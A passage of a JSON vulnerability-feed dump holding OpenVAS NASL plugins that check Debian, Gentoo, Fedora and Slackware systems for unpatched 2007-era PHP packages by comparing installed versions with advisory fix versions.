DSA 1282-1.", "modified": "2017-07-07T00:00:00", "published": "2008-01-17T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=58334", "id": "OPENVAS:58334", "title": "Debian Security Advisory DSA 1282-1 (php4)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: deb_1282_1.nasl 6616 2017-07-07 12:10:49Z cfischer $\n# Description: Auto-generated from advisory DSA 1282-1\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largerly excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"Several remote vulnerabilities have been discovered in PHP, a\nserver-side, HTML-embedded scripting language, which may lead to the\nexecution of arbitrary code. The Common Vulnerabilities and Exposures\nproject identifies the following problems:\n\nCVE-2007-1286\nStefan Esser discovered an overflow in the object reference handling\ncode of the unserialize() function, which allows the execution of\narbitrary code if malformed input is passed from an application.\n\nCVE-2007-1380\nStefan Esser discovered that the session handler performs\ninsufficient validation of variable name length values, which allows\ninformation disclosure through a heap information leak.\n\nCVE-2007-1521\nStefan Esser discovered a double free vulnerability in the\nsession_regenerate_id() function, which allows the execution of\narbitrary code.\n\nCVE-2007-1711\nStefan Esser discovered a double free vulnerability in the session\nmanagement code, which allows the execution of arbitrary code.\n\nCVE-2007-1718\nStefan Esser discovered that the mail() function performs\ninsufficient validation of folded mail headers, which allows mail\nheader injection.\n\nCVE-2007-1777\nStefan Esser discovered that the extension to handle ZIP archives\nperforms insufficient length checks, which allows the execution of\narbitrary code.\n\nFor the oldstable distribution (sarge) these problems have been fixed in\nversion 4.3.10-20.\n\nFor the stable distribution (etch) these problems have been fixed\nin version 4.4.4-8+etch2.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 4.4.6-1. php4 will be removed from sid; thus you are strongly\nadvised to migrate to php5 if you prefer to follow the unstable\ndistribution.\n\nWe recommend that you upgrade your PHP packages. Packages for the arm,\";\ntag_summary = \"The remote host is missing an update to php4\nannounced via advisory DSA 1282-1.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=DSA%201282-1\";\n\nif(description)\n{\n script_id(58334);\n script_version(\"$Revision: 6616 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 14:10:49 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-01-17 23:17:11 +0100 (Thu, 17 Jan 2008)\");\n script_cve_id(\"CVE-2007-1286\", \"CVE-2007-1380\", \"CVE-2007-1521\", \"CVE-2007-1711\", \"CVE-2007-1718\", \"CVE-2007-1777\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_name(\"Debian Security Advisory DSA 1282-1 (php4)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Debian Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/debian_linux\", \"ssh/login/packages\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-deb.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = isdpkgvuln(pkg:\"php4-pear\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache-mod-php4\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php4\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-cgi\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-cli\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-common\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-curl\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-dev\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-domxml\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-gd\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-imap\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-ldap\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mcal\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mhash\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mysql\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-odbc\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-recode\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-snmp\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-sybase\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-xslt\", ver:\"4.3.10-20\", rls:\"DEB3.1\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-pear\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache-mod-php4\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"libapache2-mod-php4\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-cgi\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-cli\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-common\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-curl\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-dev\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-domxml\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-gd\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-imap\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-ldap\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mcal\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mcrypt\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mhash\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-mysql\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-odbc\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-pgsql\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-pspell\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-recode\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-snmp\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-sybase\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-xslt\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\nif ((res = isdpkgvuln(pkg:\"php4-interbase\", ver:\"4.4.4-8+etch2\", rls:\"DEB4.0\")) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2017-07-24T12:50:10", "bulletinFamily": "scanner", "description": "The remote host is missing updates announced in\nadvisory GLSA 200705-19.", "modified": "2017-07-07T00:00:00", "published": "2008-09-24T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=58297", "id": "OPENVAS:58297", "title": "Gentoo Security Advisory GLSA 200705-19 (php)", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $\n# Description: Auto generated from Gentoo's XML based advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2008 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisories, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"PHP contains several vulnerabilities including buffer and integer overflows\nwhich could under certain conditions lead to the remote execution of\narbitrary code.\";\ntag_solution = \"All PHP 5 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-lang/php-5.2.2'\n\nAll PHP 4 users should upgrade to the latest version:\n\n # emerge --sync\n # emerge --ask --oneshot --verbose '>=dev-lang/php-4.4.7'\n\nhttp://www.securityspace.com/smysecure/catid.html?in=GLSA%20200705-19\nhttp://bugs.gentoo.org/show_bug.cgi?id=169372\";\ntag_summary = \"The remote host is missing updates announced in\nadvisory GLSA 200705-19.\";\n\n \n\nif(description)\n{\n script_id(58297);\n script_version(\"$Revision: 6596 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-07 11:21:37 +0200 (Fri, 07 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2008-09-24 21:14:03 +0200 (Wed, 24 Sep 2008)\");\n script_cve_id(\"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1286\", \"CVE-2007-1484\", \"CVE-2007-1521\", \"CVE-2007-1583\", \"CVE-2007-1700\", \"CVE-2007-1701\", \"CVE-2007-1711\", \"CVE-2007-1717\", \"CVE-2007-1718\", \"CVE-2007-1864\", \"CVE-2007-1900\", \"CVE-2007-2509\", \"CVE-2007-2510\", \"CVE-2007-2511\");\n script_tag(name:\"cvss_base\", value:\"7.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:N/I:C/A:N\");\n script_name(\"Gentoo Security Advisory GLSA 200705-19 (php)\");\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2007 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Gentoo Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/gentoo\", \"ssh/login/pkg\");\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-gentoo.inc\");\n\nres = \"\";\nreport = \"\";\nif ((res = ispkgvuln(pkg:\"dev-lang/php\", unaffected: make_list(\"rge 4.4.7\", \"ge 5.2.2\"), vulnerable: make_list(\"lt 5.2.2\"))) != NULL) {\n report += res;\n}\n\nif (report != \"\") {\n security_message(data:report);\n} else if (__pkg_match) {\n exit(99); # Not vulnerable.\n}\n", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:COMPLETE/A:NONE/"}}, {"lastseen": "2017-07-25T10:56:39", "bulletinFamily": "scanner", "description": "Check for the Version of php", "modified": "2017-07-10T00:00:00", "published": "2009-02-27T00:00:00", "href": "http://plugins.openvas.org/nasl.php?oid=861185", "id": "OPENVAS:861185", "title": "Fedora Update for php FEDORA-2007-526", "type": "openvas", "sourceData": "###############################################################################\n# OpenVAS Vulnerability Test\n#\n# Fedora Update for php FEDORA-2007-526\n#\n# Authors:\n# System Generated Check\n#\n# Copyright:\n# Copyright (c) 2009 Greenbone Networks GmbH, http://www.greenbone.net\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2\n# (or any later version), as published by the Free Software Foundation.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n###############################################################################\n\ninclude(\"revisions-lib.inc\");\ntag_affected = \"php on Fedora Core 5\";\ntag_insight = \"PHP is an HTML-embedded scripting language. PHP attempts to make it\n easy for developers to write dynamically generated webpages. PHP also\n offers built-in database integration for several commercial and\n non-commercial database management systems, so writing a\n database-enabled webpage with PHP is fairly simple. The most common\n use of PHP coding is probably as a replacement for CGI scripts. The\n mod_php module enables the Apache Web server to understand and process\n the embedded PHP language in Web pages.\";\ntag_solution = \"Please Install the Updated Packages.\";\n\n\n\nif(description)\n{\n script_xref(name : \"URL\" , value : \"https://www.redhat.com/archives/fedora-package-announce/2007-May/msg00045.html\");\n script_id(861185);\n script_version(\"$Revision: 6622 $\");\n script_tag(name:\"last_modification\", value:\"$Date: 2017-07-10 07:52:50 +0200 (Mon, 10 Jul 2017) $\");\n script_tag(name:\"creation_date\", value:\"2009-02-27 16:31:39 +0100 (Fri, 27 Feb 2009)\");\n script_tag(name:\"cvss_base\", value:\"10.0\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_xref(name: \"FEDORA\", value: \"2007-526\");\n script_cve_id(\"CVE-2007-1864\", \"CVE-2007-2509\", \"CVE-2007-2510\", \"CVE-2007-0455\", \"CVE-2007-1001\", \"CVE-2007-1285\", \"CVE-2007-1583\", \"CVE-2007-1718\", \"CVE-2007-0906\", \"CVE-2007-0907\", \"CVE-2007-0908\", \"CVE-2007-0909\", \"CVE-2007-0910\", \"CVE-2007-0988\", \"CVE-2006-5465\", \"CVE-2006-4812\");\n script_name( \"Fedora Update for php FEDORA-2007-526\");\n\n script_summary(\"Check for the Version of php\");\n script_category(ACT_GATHER_INFO);\n script_copyright(\"Copyright (C) 2009 Greenbone Networks GmbH\");\n script_family(\"Fedora Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/fedora_core\", \"ssh/login/rpms\");\n script_tag(name : \"affected\" , value : tag_affected);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n\ninclude(\"pkg-lib-rpm.inc\");\n\nrelease = get_kb_item(\"ssh/login/release\");\n\n\nres = \"\";\nif(release == NULL){\n exit(0);\n}\n\nif(release == \"FC5\")\n{\n\n if ((res = isrpmvuln(pkg:\"php\", rpm:\"php~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-pgsql\", rpm:\"x86_64/php-pgsql~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-bcmath\", rpm:\"x86_64/php-bcmath~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-ncurses\", rpm:\"x86_64/php-ncurses~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/debug/php-debuginfo\", rpm:\"x86_64/debug/php-debuginfo~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php\", rpm:\"x86_64/php~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-ldap\", rpm:\"x86_64/php-ldap~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-soap\", rpm:\"x86_64/php-soap~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-dba\", rpm:\"x86_64/php-dba~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-gd\", rpm:\"x86_64/php-gd~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-devel\", rpm:\"x86_64/php-devel~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-imap\", rpm:\"x86_64/php-imap~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-xml\", rpm:\"x86_64/php-xml~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-mysql\", rpm:\"x86_64/php-mysql~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-xmlrpc\", rpm:\"x86_64/php-xmlrpc~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-pdo\", rpm:\"x86_64/php-pdo~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-mbstring\", rpm:\"x86_64/php-mbstring~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-snmp\", rpm:\"x86_64/php-snmp~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"x86_64/php-odbc\", rpm:\"x86_64/php-odbc~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-xml\", rpm:\"i386/php-xml~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-pdo\", rpm:\"i386/php-pdo~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-imap\", rpm:\"i386/php-imap~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-xmlrpc\", rpm:\"i386/php-xmlrpc~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-bcmath\", rpm:\"i386/php-bcmath~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/debug/php-debuginfo\", rpm:\"i386/debug/php-debuginfo~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-dba\", rpm:\"i386/php-dba~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php\", rpm:\"i386/php~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-ncurses\", rpm:\"i386/php-ncurses~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-devel\", rpm:\"i386/php-devel~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-mbstring\", rpm:\"i386/php-mbstring~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-odbc\", rpm:\"i386/php-odbc~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-gd\", rpm:\"i386/php-gd~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-pgsql\", rpm:\"i386/php-pgsql~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-mysql\", rpm:\"i386/php-mysql~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-snmp\", rpm:\"i386/php-snmp~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-ldap\", rpm:\"i386/php-ldap~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"i386/php-soap\", rpm:\"i386/php-soap~5.1.6~1.6\", rls:\"FC5\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-09-01T23:58:14", "bulletinFamily": "scanner", "description": "The remote host is missing an update as announced\nvia advisory SSA:2007-127-01.", "modified": "2018-04-06T00:00:00", "published": "2012-09-11T00:00:00", "id": "OPENVAS:136141256231058262", "href": "http://plugins.openvas.org/nasl.php?oid=136141256231058262", "title": "Slackware Advisory SSA:2007-127-01 php", "type": "openvas", "sourceData": "# OpenVAS Vulnerability Test\n# $Id: esoft_slk_ssa_2007_127_01.nasl 9352 2018-04-06 07:13:02Z cfischer $\n# Description: Auto-generated from the corresponding slackware advisory\n#\n# Authors:\n# Thomas Reinke <reinke@securityspace.com>\n#\n# Copyright:\n# Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\n# Text descriptions are largely excerpted from the referenced\n# advisory, and are Copyright (c) the respective author(s)\n#\n# This program is free software; you can redistribute it and/or modify\n# it under the terms of the GNU General Public License version 2,\n# or at your option, GNU General Public License version 3,\n# as published by the Free Software Foundation\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program; if not, write to the Free Software\n# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.\n#\n\ninclude(\"revisions-lib.inc\");\ntag_insight = \"New php packages are available for Slackware 10.2, 11.0, and -current\nto improve the stability and security of PHP. Quite a few bugs were\nfixed -- please see http://www.php.net for a detailed list.\nAll sites that use PHP are encouraged to upgrade. Please note that\nwe haven't tested all PHP applications for backwards compatibility\nwith this new upgrade, so you should have the old package on hand\njust in case.\n\nBoth PHP 4.4.7 and PHP 5.2.2 updates have been provided.\";\ntag_summary = \"The remote host is missing an update as announced\nvia advisory SSA:2007-127-01.\";\n\ntag_solution = \"https://secure1.securityspace.com/smysecure/catid.html?in=SSA:2007-127-01\";\n \nif(description)\n{\n script_oid(\"1.3.6.1.4.1.25623.1.0.58262\");\n script_tag(name:\"creation_date\", value:\"2012-09-11 01:34:21 +0200 (Tue, 11 Sep 2012)\");\n script_tag(name:\"last_modification\", value:\"$Date: 2018-04-06 09:13:02 +0200 (Fri, 06 Apr 2018) $\");\n script_cve_id(\"CVE-2007-1001\");\n script_tag(name:\"cvss_base\", value:\"6.8\");\n script_tag(name:\"cvss_base_vector\", value:\"AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_version(\"$Revision: 9352 $\");\n name = \"Slackware Advisory SSA:2007-127-01 php \";\n script_name(name);\n\n\n\n script_category(ACT_GATHER_INFO);\n\n script_copyright(\"Copyright (c) 2012 E-Soft Inc. http://www.securityspace.com\");\n script_family(\"Slackware Local Security Checks\");\n script_dependencies(\"gather-package-list.nasl\");\n script_mandatory_keys(\"ssh/login/slackware_linux\", \"ssh/login/slackpack\");\n script_tag(name : \"solution\" , value : tag_solution);\n script_tag(name : \"insight\" , value : tag_insight);\n script_tag(name : \"summary\" , value : tag_summary);\n script_tag(name:\"qod_type\", value:\"package\");\n script_tag(name:\"solution_type\", value:\"VendorFix\");\n exit(0);\n}\n\n#\n# The script code starts here\n#\n\ninclude(\"pkg-lib-slack.inc\");\nvuln = 0;\nif(isslkpkgvuln(pkg:\"php\", ver:\"5.2.2-i486-1_slack10.2\", rls:\"SLK10.2\")) {\n vuln = 1;\n}\nif(isslkpkgvuln(pkg:\"php\", ver:\"5.2.2-i486-1_slack11.0\", 